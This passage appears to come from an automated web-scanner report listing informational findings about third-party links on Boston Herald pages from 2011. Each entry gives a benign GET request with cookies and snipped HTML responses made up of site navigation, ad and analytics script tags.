<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312552&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312552&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312552&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(15) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Another winter wallop batters Boston');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<p><object id="flashObj" width="440" height="294" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0"><param name="movie" value="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" />
...[SNIP]...
<param name="allowScriptAccess" value="always" /><embed src="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" bgcolor="#FFFFFF" flashVars="@videoPlayer=765743172001&playerID=90384043001&playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwujoDnoZHHOVvr4yXqH2wi5E&domain=embed&dynamicStreaming=true" base="http://admin.brightcove.com" name="flashObj" width="440" height="294" seamlesstabbing="false" type="application/x-shockwave-flash" allowFullScreen="true" swLiveConnect="true" allowScriptAccess="always" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></embed>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312552&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(15) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
open photo gallery: Snow piles up in Bay State" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4880','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/3057c6_Plow_01282011.jpg" alt="PILING UP: Crews work to clear mounds..." /></A>
...[SNIP]...
<A HREF="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4880','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110128/stp/e5e8bf_012711snowtf12.JPG" alt="Boston Herald"></a>
...[SNIP]...
<div id="buyPhotosBar">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/news\\Snow piles up in Bay State"><img src="/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/news\\Snow piles up in Bay State">Purchase Herald Photos</a>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/news/regional/view/20110128disabled_resident_tells_city_tap_kids_to_shovel/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/817069_Snowride_01282011.jpg" alt="Disabled resident tells city: Tap kids to shovel" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.292. http://www.bostonherald.com/photobox/index.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /photobox/index.bg

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /photobox/index.bg?type=home&page=3 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:14:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title=" - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fphotobox%2Findex.bg%3Ftype%3Dhome%26page%3D3&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.293. http://www.bostonherald.com/projects/mcas2009

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/mcas2009

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /projects/mcas2009?srvc=slider HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
<!-- // special_projects/ge
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

   <link rel="alternate" title=" - " href="http://feeds.feedburner.com/bostonherald" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
    </div>
    <div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com/news/home"></IFRAME>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="/images/siteImages/icons/social_media/16px/facebook.png" />
...[SNIP]...
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="/images/siteImages/icons/social_media/16px/twitter.png" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.294. http://www.bostonherald.com/projects/your_tax_dollars.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/your_tax_dollars.bg

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /projects/your_tax_dollars.bg?src=Mwra HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title=" - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fprojects%2Fyour_tax_dollars.bg%3Fsrc%3DMwra&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<input type="button" value="Go" onClick="PayrollTable.setPageNumber(1);PayrollTable.getRows();"> <img id="ajax-loader" style="position: relative; top: 2px; display: none;" src="http://cache.heraldinteractive.com/images/siteImages/icons/ajax-loader.gif" />
<a id="clear_results" href="javascript: void(0);" onclick="PayrollTable.initialize();" style="display: none;" >
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.295. http://www.bostonherald.com/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /search/

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /search/?topic=Hillary Chabot&type=byline&searchSite=recent&x=10&y=10 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:05:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
